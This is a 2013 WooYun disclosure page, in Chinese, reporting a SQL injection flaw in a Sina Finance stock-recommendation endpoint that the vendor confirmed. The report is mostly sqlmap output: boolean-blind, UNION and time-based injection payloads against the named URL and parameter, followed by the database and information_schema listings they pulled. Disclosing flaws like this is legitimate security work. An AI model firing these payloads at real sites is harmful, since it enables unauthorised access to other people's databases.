当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039774

漏洞标题:新浪财经的一个sqli注入漏洞

相关厂商:新浪

漏洞作者: 霍大然

提交时间:2013-10-15 11:02

修复时间:2013-11-29 11:03

公开时间:2013-11-29 11:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-15: 细节已通知厂商并且等待厂商处理中
2013-10-15: 厂商已经确认,细节仅向厂商公开
2013-10-25: 细节向核心白帽子及相关领域专家公开
2013-11-04: 细节向普通白帽子公开
2013-11-14: 细节向实习白帽子公开
2013-11-29: 细节向公众公开

简要描述:

新浪财经的一个sqli注入漏洞

详细说明:

注入点:
http://biz.finance.sina.com.cn/stkrcmd/stkrcmd_people.php?stk_id=sh600981 (GET)
Place: GET
Parameter: stk_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: stk_id=sh600981' AND 5502=5502 AND 'oTFg'='oTFg
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: stk_id=sh600981' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e747071,0x4f434a4f5248524f7a70,0x716a667471),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: stk_id=sh600981' AND SLEEP(5) AND 'VpRa'='VpRa
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Payload: stk_id=sh600981' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e747071,0x4f434a4f5248524f7a70,0x716a667471),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: stk_id=sh600981' AND SLEEP(5) AND 'VpRa'='VpRa
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] biz
[*] information_schema
[*] test
back-end DBMS: MySQL 5.0.11
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: USER_PRIVILEGES
[4 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| GRANTEE | varchar(81) |
| IS_GRANTABLE | varchar(3) |
| PRIVILEGE_TYPE | varchar(64) |
| TABLE_CATALOG | varchar(512) |
+----------------+--------------+
web application technology: Apache
back-end DBMS: MySQL 5.0.11
Database: information_schema
Table: TABLES
[21 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| VERSION | bigint(21) |
| AUTO_INCREMENT | bigint(21) |
| AVG_ROW_LENGTH | bigint(21) |
| CHECK_TIME | datetime |
| CHECKSUM | bigint(21) |
| CREATE_OPTIONS | varchar(255) |
| CREATE_TIME | datetime |
| DATA_FREE | bigint(21) |
| DATA_LENGTH | bigint(21) |
| ENGINE | varchar(64) |
| INDEX_LENGTH | bigint(21) |
| MAX_DATA_LENGTH | bigint(21) |
| ROW_FORMAT | varchar(10) |
| TABLE_CATALOG | varchar(512) |
| TABLE_COLLATION | varchar(64) |
| TABLE_COMMENT | varchar(80) |
| TABLE_NAME | varchar(64) |
| TABLE_ROWS | bigint(21) |
| TABLE_SCHEMA | varchar(64) |
| TABLE_TYPE | varchar(64) |
| UPDATE_TIME | datetime |
+-----------------+--------------+

漏洞证明:

8.PNG

修复方案:

对参数过滤

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-10-15 11:24

厂商回复:

感谢关注新浪安全,马上安排相关人员修复

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-15 11:20 | MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)

    Sqli 是什么?

  2. 2013-10-15 11:23 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)

    你眼力真好,我都没发现多打了一个i

  3. 2013-10-15 14:09 | Fireweed ( 普通白帽子 | Rank:107 漏洞数:14 | Show me the #)

    Sqli是sql的下一个版本